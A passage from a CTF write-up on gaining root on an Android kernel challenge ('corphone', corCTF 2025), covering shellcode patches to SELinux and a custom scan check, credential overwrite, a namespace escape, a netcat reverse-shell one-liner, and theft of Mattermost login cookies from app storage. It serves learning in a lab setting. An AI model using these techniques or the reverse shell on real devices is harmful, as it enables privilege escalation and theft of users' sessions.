    <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">avc_denied_shellcode</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span><span class="mh">0x48</span><span class="p">,</span> <span class="mh">0x31</span><span class="p">,</span> <span class="mh">0xc0</span><span class="p">,</span> <span class="mh">0xc3</span><span class="p">};</span>
    <span class="n">SYSCHK</span><span class="p">(</span><span class="n">write</span><span class="p">(</span><span class="n">reclaim_pfds</span><span class="p">[</span><span class="n">victim_pipe_idx</span><span class="p">][</span><span class="mi">1</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">avc_denied_w_pte</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">avc_denied_w_pte</span><span class="p">)));</span>

    <span class="c1">// back to tmp_page again</span>
    <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">read_data</span><span class="p">;</span>
    <span class="n">SYSCHK</span><span class="p">(</span><span class="n">read</span><span class="p">(</span><span class="n">reclaim_pfds</span><span class="p">[</span><span class="n">victim_pipe_idx</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">read_data</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">read_data</span><span class="p">)));</span>

    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">512</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="kt">void</span> <span class="o">*</span><span class="n">ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">BASE_MMAP_ADDR</span> <span class="o">+</span> <span class="n">i</span> <span class="o">*</span> <span class="mh">0x200000</span><span class="p">;</span>
        <span class="n">memcpy</span><span class="p">(</span><span class="n">ptr</span> <span class="o">+</span> <span class="n">avc_denied_offset</span><span class="p">,</span> <span class="n">avc_denied_shellcode</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">avc_denied_shellcode</span><span class="p">));</span>
    <span class="p">}</span>
<span class="p">}</span>

</code></pre></div></div>
<h4 id="362-patch-the-corav-check">3.6.2. Patch the corav Check</h4>

<p>Furthermore, the <code class="language-plaintext highlighter-rouge">corav_scan()</code> function is invoked whenever a binary is executed. It blocks certain binaries from being used, so we need to patch <code class="language-plaintext highlighter-rouge">corav_initialized</code> to zero in order to disable this access check. Otherwise, spawning a shell would not be allowed.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">corav_scan</span><span class="p">(</span><span class="k">struct</span> <span class="n">linux_binprm</span> <span class="o">*</span><span class="n">bprm</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">corav_initialized</span><span class="p">)</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<h4 id="363-other-mitigations">3.6.3. Other Mitigations</h4>

<p>To escalate privileges to the root user, I first referred to the <a href="https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-YongLiu-USMA-Share-Kernel-Code.pdf">USMA attack</a> and patched one byte in <code class="language-plaintext highlighter-rouge">__sys_setresuid()</code> to bypass the <code class="language-plaintext highlighter-rouge">ns_capable_setid()</code> check:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">long</span> <span class="nf">__sys_setresuid</span><span class="p">(</span><span class="n">uid_t</span> <span class="n">ruid</span><span class="p">,</span> <span class="n">uid_t</span> <span class="n">euid</span><span class="p">,</span> <span class="n">uid_t</span> <span class="n">suid</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">((</span><span class="n">ruid_new</span> <span class="o">||</span> <span class="n">euid_new</span> <span class="o">||</span> <span class="n">suid_new</span><span class="p">)</span> <span class="o">&amp;&amp;</span>
        <span class="o">!</span><span class="n">ns_capable_setid</span><span class="p">(</span><span class="n">old</span><span class="o">-&gt;</span><span class="n">user_ns</span><span class="p">,</span> <span class="n">CAP_SETUID</span><span class="p">))</span>
        <span class="k">return</span> <span class="o">-</span><span class="n">EPERM</span><span class="p">;</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>However, the root user <strong>does not gain full control over resources</strong> because it has <strong>no capabilities</strong>. For example, even the <code class="language-plaintext highlighter-rouge">/tmp</code> directory owned by the <code class="language-plaintext highlighter-rouge">shell</code> user cannot be accessed:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>:/ # cat /proc/$$/status | grep Cap
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000000000000000
CapAmb: 0000000000000000

:/ # ls -al /tmp
ls: /tmp: Permission denied
</code></pre></div></div>

<p>Moreover, due to the <strong>mount namespace</strong>, a shell spawned by an untrusted application can only access a limited view of the filesystem. This can be verified by comparing the namespaces of the init process (PID 1) and the reverse shell process (PID 2525):</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aaa@aaa:~<span class="nv">$ </span>adb shell su 0 <span class="nb">ls</span> <span class="nt">-al</span> /proc/2525/ns/
total 0
dr-x--x--x 2 root u0_a116 0 2025-09-08 06:19 <span class="nb">.</span>
dr-xr-xr-x 9 root u0_a116 0 2025-09-08 04:45 ..
lrwxrwxrwx 1 root u0_a116 0 2025-09-08 06:19 cgroup -&gt; cgroup:[4026531835]
lrwxrwxrwx 1 root u0_a116 0 2025-09-08 06:19 mnt -&gt; mnt:[4026533945] <span class="c"># &lt;------------------</span>
lrwxrwxrwx 1 root u0_a116 0 2025-09-08 06:19 net -&gt; net:[4026531840]
lrwxrwxrwx 1 root u0_a116 0 2025-09-08 06:19 uts -&gt; uts:[4026531838]

aaa@aaa:~<span class="nv">$ </span>adb shell su 0 <span class="nb">ls</span> <span class="nt">-al</span> /proc/1/ns/
total 0
dr-x--x--x 2 root root 0 2025-09-08 04:44 <span class="nb">.</span>
dr-xr-xr-x 9 root root 0 2025-09-08 04:44 ..
lrwxrwxrwx 1 root root 0 2025-09-08 06:20 cgroup -&gt; cgroup:[4026531835]
lrwxrwxrwx 1 root root 0 2025-09-08 04:44 mnt -&gt; mnt:[4026533086] <span class="c"># &lt;------------------</span>
lrwxrwxrwx 1 root root 0 2025-09-08 06:20 net -&gt; net:[4026531840]
lrwxrwxrwx 1 root root 0 2025-09-08 06:20 uts -&gt; uts:[4026531838]
</code></pre></div></div>

<p>And also, <code class="language-plaintext highlighter-rouge">/proc</code> is mounted with the option <code class="language-plaintext highlighter-rouge">hidepid=invisible</code>. This option makes processes owned by other UIDs invisible, further isolating the environment. Only processes that belong to group 3009 (<code class="language-plaintext highlighter-rouge">AID_READPROC</code>) are allowed to view the entire <code class="language-plaintext highlighter-rouge">/proc/</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>:/ $ mount | grep hide
proc on /proc type proc (rw,relatime,gid=3009,hidepid=invisible)
</code></pre></div></div>

<p>This check is performed by the function <code class="language-plaintext highlighter-rouge">proc_pid_readdir()</code> when listing <code class="language-plaintext highlighter-rouge">/proc</code> entries. If <code class="language-plaintext highlighter-rouge">has_pid_permissions()</code> returns false, the corresponding process entry will be skipped [1].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">proc_pid_readdir</span><span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">,</span> <span class="k">struct</span> <span class="n">dir_context</span> <span class="o">*</span><span class="n">ctx</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="k">for</span> <span class="p">(</span><span class="n">iter</span> <span class="o">=</span> <span class="n">next_tgid</span><span class="p">(</span><span class="n">ns</span><span class="p">,</span> <span class="n">iter</span><span class="p">);</span>
         <span class="n">iter</span><span class="p">.</span><span class="n">task</span><span class="p">;</span>
         <span class="n">iter</span><span class="p">.</span><span class="n">tgid</span> <span class="o">+=</span> <span class="mi">1</span><span class="p">,</span> <span class="n">iter</span> <span class="o">=</span> <span class="n">next_tgid</span><span class="p">(</span><span class="n">ns</span><span class="p">,</span> <span class="n">iter</span><span class="p">))</span> <span class="p">{</span>
        <span class="kt">char</span> <span class="n">name</span><span class="p">[</span><span class="mi">10</span> <span class="o">+</span> <span class="mi">1</span><span class="p">];</span>
        <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">len</span><span class="p">;</span>

        <span class="n">cond_resched</span><span class="p">();</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">has_pid_permissions</span><span class="p">(</span><span class="n">fs_info</span><span class="p">,</span> <span class="n">iter</span><span class="p">.</span><span class="n">task</span><span class="p">,</span> <span class="n">HIDEPID_INVISIBLE</span><span class="p">))</span> <span class="c1">// [1]</span>
            <span class="k">continue</span><span class="p">;</span>

        <span class="c1">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">has_pid_permissions()</code> function checks whether the current hidepid level is lower than the required threshold [2], which in this case is <code class="language-plaintext highlighter-rouge">HIDEPID_INVISIBLE</code>. It then verifies whether the current process belongs to group 3009 [3]. Finally, it attempts <strong>a ptrace access to the target process</strong>, [4] returning true if successful.</p>

<p>This is why a process with UID 0 may still be unable to read information about other UID 0 processes from <code class="language-plaintext highlighter-rouge">/proc</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="n">bool</span> <span class="nf">has_pid_permissions</span><span class="p">(</span><span class="k">struct</span> <span class="n">proc_fs_info</span> <span class="o">*</span><span class="n">fs_info</span><span class="p">,</span>
                 <span class="k">struct</span> <span class="n">task_struct</span> <span class="o">*</span><span class="n">task</span><span class="p">,</span>
                 <span class="k">enum</span> <span class="n">proc_hidepid</span> <span class="n">hide_pid_min</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">fs_info</span><span class="o">-&gt;</span><span class="n">hide_pid</span> <span class="o">==</span> <span class="n">HIDEPID_NOT_PTRACEABLE</span><span class="p">)</span>
        <span class="k">return</span> <span class="n">ptrace_may_access</span><span class="p">(</span><span class="n">task</span><span class="p">,</span> <span class="n">PTRACE_MODE_READ_FSCREDS</span><span class="p">);</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">fs_info</span><span class="o">-&gt;</span><span class="n">hide_pid</span> <span class="o">&lt;</span> <span class="n">hide_pid_min</span><span class="p">)</span> <span class="c1">// [2]</span>
        <span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">in_group_p</span><span class="p">(</span><span class="n">fs_info</span><span class="o">-&gt;</span><span class="n">pid_gid</span><span class="p">))</span> <span class="c1">// [3]</span>
        <span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
    <span class="k">return</span> <span class="n">ptrace_may_access</span><span class="p">(</span><span class="n">task</span><span class="p">,</span> <span class="n">PTRACE_MODE_READ_FSCREDS</span><span class="p">);</span> <span class="c1">// [4]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Additionally, although not directly related to privilege escalation, Android applies certain <strong>seccomp rules</strong> to untrusted applications, which means some syscalls are not allowed.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aaa@aaa:~<span class="nv">$ </span>adb shell <span class="nb">cat</span> /proc/2525/status | <span class="nb">grep </span>Seccomp
Seccomp:                2
Seccomp_filters:        1
</code></pre></div></div>

<p>You can find the actual restricted syscalls in the <a href="https://android.googlesource.com/platform/bionic/+/refs/heads/main/libc/">bionic source code</a>. The final seccomp allowlist is derived as: <code class="language-plaintext highlighter-rouge">SYSCALLS.TXT</code> - <code class="language-plaintext highlighter-rouge">SECCOMP_BLOCKLIST.TXT</code> + <code class="language-plaintext highlighter-rouge">SECCOMP_ALLOWLIST.TXT</code>.</p>

<h4 id="364-bypass-them-and-get-root">3.6.4. Bypass Them and Get Root</h4>

<p>The capabilities are stored in <code class="language-plaintext highlighter-rouge">struct cred</code>, along with the UID and GID. Therefore, injecting shellcode that calls <strong><code class="language-plaintext highlighter-rouge">commit_creds(prepare_kernel_cred(NULL))</code></strong> to reuse the cred of <code class="language-plaintext highlighter-rouge">&amp;init_task</code> is sufficient.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">cred</span> <span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="n">kuid_t</span> <span class="n">uid</span><span class="p">;</span>        <span class="cm">/* real UID of the task */</span>
    <span class="n">kgid_t</span> <span class="n">gid</span><span class="p">;</span>        <span class="cm">/* real GID of the task */</span>
    <span class="c1">// [...]</span>
    <span class="n">kernel_cap_t</span> <span class="n">cap_inheritable</span><span class="p">;</span>  <span class="cm">/* caps our children can inherit */</span>
    <span class="n">kernel_cap_t</span> <span class="n">cap_permitted</span><span class="p">;</span>    <span class="cm">/* caps we're permitted */</span>
    <span class="n">kernel_cap_t</span> <span class="n">cap_effective</span><span class="p">;</span>    <span class="cm">/* caps we can actually use */</span>
    <span class="n">kernel_cap_t</span> <span class="n">cap_bset</span><span class="p">;</span>         <span class="cm">/* capability bounding set */</span>
    <span class="n">kernel_cap_t</span> <span class="n">cap_ambient</span><span class="p">;</span>      <span class="cm">/* Ambient capability set */</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>After this, we gain <strong>full root privileges</strong>:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0
</code></pre></div></div>

<p>At this point, the entire <code class="language-plaintext highlighter-rouge">/proc</code> can be listed:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0
:/ # ls -al /proc/
total 4
dr-xr-xr-x 477 root           root               0 2025-09-08 07:48 .
drwxr-xr-x  27 root           root             683 2009-01-01 00:00 ..
dr-xr-xr-x   9 root           root               0 2025-09-08 07:48 1
dr-xr-xr-x   9 root           root               0 2025-09-08 07:48 100
dr-xr-xr-x   9 root           root               0 2025-09-08 07:48 101
dr-xr-xr-x   9 root           root               0 2025-09-08 07:48 102
[...]
</code></pre></div></div>

<p>However, because we are still in a different mount namespace, the private data of other applications remains inaccessible:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>:/ # ls -al /data/data/
total 11
drwxr-x--x  3 root    root      60 2025-09-08 07:48 .
drwxrwx--x 52 system  system  4096 2025-09-08 07:48 ..
drwx------  5 u0_a116 u0_a116 3452 2025-09-08 04:34 com.example.notabackdoor2
</code></pre></div></div>

<p>By executing <code class="language-plaintext highlighter-rouge">nsenter -t 1 -m sh</code>, we can spawn a new shell <strong>inside the mount namespace of the init process</strong>. From there, it becomes possible to view the entire <code class="language-plaintext highlighter-rouge">/data/data</code> directory:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>:/ # nsenter -t 1 -m sh
ls -al /data/data | head -n 10
total 462
drwxrwx--x 148 system         system         20480 2025-09-08 04:32 .
drwxrwx--x  52 system         system          4096 2025-09-08 07:48 ..
drwx------   4 system         system          3452 2025-09-08 04:31 android
drwx------   4 u0_a18         u0_a18          3452 2025-09-08 04:31 android.cuttlefish.overlay
drwx------   4 u0_a17         u0_a17          3452 2025-09-08 04:31 android.cuttlefish.phone.overlay
drwx------   4 u0_a112        u0_a112         3452 2025-09-08 04:31 android.ext.services
drwx------   4 u0_a46         u0_a46          3452 2025-09-08 04:31 android.ext.shared
drwx------   4 system         system          3452 2025-09-08 04:31 com.android.DeviceAsWebcam
drwx------   4 u0_a99         u0_a99          3452 2025-09-08 04:31 com.android.adservices.api
</code></pre></div></div>

<h4 id="365-post-root">3.6.5. Post Root</h4>

<p>I used the following command to get a reverse shell - thanks to devil for the help with this part!</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">mkfifo</span> /sdcard/Download/bruh<span class="p">;</span><span class="nb">cat</span> /sdcard/Download/bruh|/system/bin/sh <span class="nt">-i</span> 2&gt;&amp;1|nc <span class="nv">$IP</span> <span class="nv">$PORT</span> <span class="o">&gt;</span>/sdcard/Download/bruh
</code></pre></div></div>

<p>After obtaining root reverse shell, we followed the author’s hint and extracted the login cookie from <code class="language-plaintext highlighter-rouge">/data/data/com.mattermost.rn/app_webview/Default/Cookies</code>, which is a SQLite3 database. Inside, we found three cookies used to authenticate to a private Mattermost website:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sqlite&gt; SELECT * FROM cookies;
13401091427226867|rbtree.ctfi.ng||MMAUTHTOKEN|&lt;REDACTED&gt;||/&lt;REDACTED&gt;-secret-pigeon-club-&lt;REDACTED&gt;|13416643427000000|1|1|13401091427226867|1|1|1|-1|2|443|13401091427226948|3|1
13401091427227273|rbtree.ctfi.ng||MMCSRF|&lt;REDACTED&gt;||/&lt;REDACTED&gt;-secret-pigeon-club-&lt;REDACTED&gt;|13416643427000000|1|0|13401091427227273|1|1|1|-1|2|443|13401091427227282|3|1
13401091427227233|rbtree.ctfi.ng||MMUSERID|&lt;REDACTED&gt;||/&lt;REDACTED&gt;-secret-pigeon-club-&lt;REDACTED&gt;|13416643427000000|1|0|13401091427227233|1|1|1|-1|2|443|13401091427227248|3|1
</code></pre></div></div>

<p>Once logging in with these cookies, you can see the chat channel looks like this:</p>

<p><img src="/assets/image-20250908000000000.png" alt="image-20250908000000000" style="display: block; margin-left: auto; margin-right: auto; zoom:50%;" /></p>

<p>Just scroll up the chat, and you’ll find the pigeon’s secret :). 🕊️🕊️🕊️</p>

<p><img src="/assets/image-20250908000000001.png" alt="image-20250908000000001" style="display: block; margin-left: auto; margin-right: auto; zoom:50%;" /></p>

<h2 id="4-epilogue--conclusion">4. Epilogue &amp; Conclusion</h2>

<p>In fact, after I patched <code class="language-plaintext highlighter-rouge">__sys_setresuid()</code> and failed to obtain full root, I got stuck and had no idea how to proceed. Billy, however, shared with me a private exploitation technique that also achieves full root without preparing kernel credentials — which is quite amazing! I’ll keep it a secret, since he doesn’t want it to be made public 🫢.</p>

<p>I believe there are still many potential methods to escalate to root. But without a solid understanding of Android’s mitigation mechanisms, one might end up relying on trial and error, which can be both time-consuming and frustrating when developing an exploit.</p>

<p>Anyway, I learned a lot about Android while working on this challenge and I’m happy that I managed to solve it before the CTF ended. I hope you can also learn something from this write-up. Thanks again to Billy (@st424204) and devil (d3vil)!</p>

<p>You can find the full exploit <a href="/assets/corctf-2025-corphone-exp.c">here</a>.</p>]]></content><author><name></name></author><category term="Android" /><summary type="html"><![CDATA[Last week, I participated in corCTF as part of team Billy (simply because my friend Billy (@st424204) was also playing it in his free time) and solved an Android pwn challenge, corphone. Although I had some prior research experience with Android, this was the first time I successfully achieved LPE on it!]]></summary></entry></feed>